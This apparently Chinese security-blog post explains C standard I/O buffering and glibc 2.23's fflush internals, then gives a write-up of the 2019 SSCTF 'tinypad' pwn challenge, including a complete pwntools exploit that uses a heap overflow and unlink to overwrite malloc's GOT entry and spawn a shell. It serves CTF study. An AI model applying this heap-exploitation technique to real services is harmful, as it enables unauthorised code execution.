缓冲区机制详解-安全KER - 安全资讯平台

在最近的几场比赛中，部分赛题牵扯到缓冲区的知识，之前对这块的知识还不够特别的理解，所以抽时间来总结一下。

一、什么是缓冲区机制

首先我们要知道什么是缓冲区

总的来说，缓冲区是内存空间的一部分，在内存中预留了一定的存储空间，用来暂时保存输入和输出等I/O操作的一些数据，这些预留的空间就叫做缓冲区；而buffer缓冲区和Cache缓存区都属于缓冲区的一种

buffer缓冲区存储速度不同步的设备或者优先级不同的设备之间的传输数据，比如键盘、鼠标等；此外，buffer一般是用在写入磁盘的；

Cache缓存区是位于CPU和主内存之间的容量较小但速度很快的存储器，Cache保存着CPU刚用过的数据或循环使用的数据；Cache缓存区的运用一般是在I/O的请求上

缓存区按性质分为两种，一种是输入缓冲区，另一种是输出缓冲区。对于C、C++程序来言，类似cin、getchar等输入函数读取数据时，并不会直接从键盘上读取，而是遵循着一个过程：cingetchar --> 输入缓冲区 --> 键盘，我们从键盘上输入的字符先存到缓冲区里面，cingetchar等函数是从缓冲区里面读取输入；那么相对于输出来说，程序将要输出的结果并不会直接输出到屏幕当中区，而是先存放到输出缓存区，然后利用coutputchar等函数将缓冲区中的内容输出到屏幕上。cin和cout本质上都是对缓冲区中的内容进行操作。

二、为什么使用缓冲区机制

减少CPU对磁盘的读写次数；CPU读取磁盘中的数据并不是直接读取磁盘，而是先将磁盘的内容读入到内存，也就是缓冲区，然后CPU对缓冲区进行读取，进而操作数据；计算机对缓冲区的操作时间远远小于对磁盘的操作时间，大大的加快了运行速度。下面一个图片描述的就是这样的一个过程

提高CPU的执行效率；比如说使用打印机打印文档，打印的速度是相对比较慢的，我们操作CPU将要打印的内容输出到缓冲区中，然后CPU转手就可以做其他的操作，进而提高CPU的效率

合并读写；比如说对于一个文件的数据，先读取后写入，循环执行10次，然后关闭文件，如果存在缓冲机制，那么就可能只有第一次读和最后一次写是真实操作，其他的操作都是在操作缓存

三、缓冲区的分类

缓冲区分为三大类：全缓冲、行缓冲、无缓冲

全缓冲；只有在缓冲区被填满之后才会进行I/O操作；最典型的全缓冲就是对磁盘文件的读写。
行缓冲；只有在输入或者是输出中遇到换行符的时候才会进行I/O操作；这忠允许我们一次写一个字符，但是只有在写完一行之后才做I/O操作。一般来说，标准输入流(stdin)和标准输出流(stdout)是行缓冲。
无缓冲；标准I/O不缓存字符；其中表现最明显的就是标准错误输出流(stderr)，这使得出错信息尽快的返回给用户。

四、对缓冲区操作的函数（C语言）

标准输出函数：printf、puts、putchar等。

标准输入函数：scanf、gets、getchar等。

IO_FILE：fopen、fwrite、fread、fseek等

fflush函数的作用是清除缓冲区中的内容，如下所示（实验环境影响差距较大）:

#include <stdio.h>
#include <stdlib.h>
int main(){
    int a;

    char b;

    scanf("%d", &a);

    b = getchar();

    printf("a = %d, b = %p n", a, b);

    return 0;
}

输入123↙，程序输出如下：

一筐萝卜➜ test  ./test_1                       
123↙
a = 123, b = 0xa

在程序中添加上fflush后

#include <stdio.h>
#include <stdlib.h>
int main()
{
    int a;

    char b;

    scanf("%d", &a);

    fflush(stdin);

    b = getchar();

    printf("a = %d, b = %p n", a, b);

    return 0;
}

输入123↙,程序输出如下

一筐萝卜➜ test  ./test_1                       
123↙
c↙
a = 123, b = 0x63

可以看出来fflush的效果，那么现在跟进源码来看fflush是怎么处理的

此glibc源码的版本是2.23

/glibc-2.23/libio/iofflush.c:31

int
_IO_fflush (_IO_FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF : 0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

在这段代码里面最关键的就是调用了vtable中的_IO_new_file_sync函数,在这个函数中将标准输入流（stdin）刷新

/glibc-2.23/libio/fileops.c:867

int
_IO_new_file_sync (_IO_FILE *fp)
{
  _IO_ssize_t delta;
  int retval = 0;

  /*    char* ptr = cur_ptr(); */
  if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
  if (delta != 0)
    {
#ifdef TODO
      if (_IO_in_backup (fp))
    delta -= eGptr () - Gbase ();
#endif
      _IO_off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
      if (new_pos != (_IO_off64_t) EOF)
    fp->_IO_read_end = fp->_IO_read_ptr;
#ifdef ESPIPE
      else if (errno == ESPIPE)
    ; /* Ignore error from unseekable devices. */
#endif
      else
    retval = EOF;
    }
  if (retval != EOF)
    fp->_offset = _IO_pos_BAD;
  /* FIXME: Cleanup - can this be shared? */
  /*    setg(base(), ptr, ptr); */
  return retval;
}
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)

另一个重要的函数就是setbuf和setvbuf，这两个函数都是用来在程序中设置缓冲机制的。具体的用法可以到菜鸟教程上详细的学习。
setbuf
setvbuf

例子（2019SSCTF攻防赛-pwn）

该程序只开启了NX（堆栈不可执行）保护

一筐萝卜➜ sscft  checksec --file tinypad 
[*] '/root/sscft/tinypad'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

拖到IDA中分析代码，main函数一目了然，典型的菜单题

在edit中存在任意长度输入，可造成堆溢出

int edit_node()
{
  int v1; // [rsp+8h] [rbp-8h]
  int v2; // [rsp+Ch] [rbp-4h]

  printf("enter the index of the node you want to edit:");
  __isoc99_scanf((__int64)"%d", (__int64)&v2);
  printf("please enter the length of the input:", &v2);
  __isoc99_scanf((__int64)"%d", (__int64)&v1);
  getchar();
  printf("please enter the contents of the node:", &v1);
  fread(name[v2], v1, 1uLL, stdin);
  return puts("edit compete!");
}

在delete中存在UAF

int delete_node()
{
  int v1; // [rsp+Ch] [rbp-4h]

  printf("enter the index of the node you want to create:");
  __isoc99_scanf((__int64)"%d", (__int64)&v1);
  free(name[v1]);
  return puts("delete complete!");
}

我们利用堆溢出来伪造chunk，如图所示

然后delete第二个chunk，进而触发Unlink-Exploit

成功达到bss段上name的区域可控，第二步泄露libc地址，第三步覆盖malloc_got地址为后门函数的地址

最后调用create，获取到shell

可以看出来对该程序漏洞的利用并不难，但是由于该程序没有设置无缓冲，在pwn远程的时候没有回显，在比赛的时候没能打通远程服务器

我在本地搭建了该题目的环境，nc连接的时候同样是无回显

经过一番测试之后，发现如果把脚本中所有的recv函数都去掉之后，按照顺序发送payload，最后也能getshell。

完整exp：

from pwn import *
context.log_level = 'debug'

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+":"+hex(x))
ri = lambda : r.interactive()

def create(index):
    # ru("---------------------------")
    sl(str(1))
    sl(str(index))
    # ru("create complete")


def delete(index):
    # ru("---------------------------")
    sl(str(3))
    sl(str(index))

def edit(index,size,content):
    # ru("---------------------------")
    sl(str(2))
    sl(str(index))
    sl(str(size))
    sl(content)

def tiaoshi():
    gdb.attach(r)
    raw_input()


def show(index):
    # ru("---------------------------")
    sl(str(4))
    # ru("enter the index of the node you want to create:")
    sl(str(index))
# r = process("./tinypad")
# r = remote("192.168.10.85",2019)
r = remote("127.0.0.1",5556)

file = ELF("./tinypad")
shell = 0x0000000004009B6
malloc_got = file.got['malloc']
free_got = file.got['free']

create(0)
create(1)

target = 0x0000000006012A0
fd = target-0x18
bk = target-0x10
payload = "a"*8+p64(0x81)+p64(fd)+p64(bk)+"a"*0x60+p64(0x80)+p64(0x90)
edit(0,0x90,payload)
delete(1)

payload = "a"*24+p64(0x6012A0)+p64(malloc_got)+p64(free_got)
edit(0,0x31,payload)
payload = p64(shell)
create(4)
edit(1,0x8,payload)

# ru("---------------------------")

sl(str(1))
sl(str(5))
ri()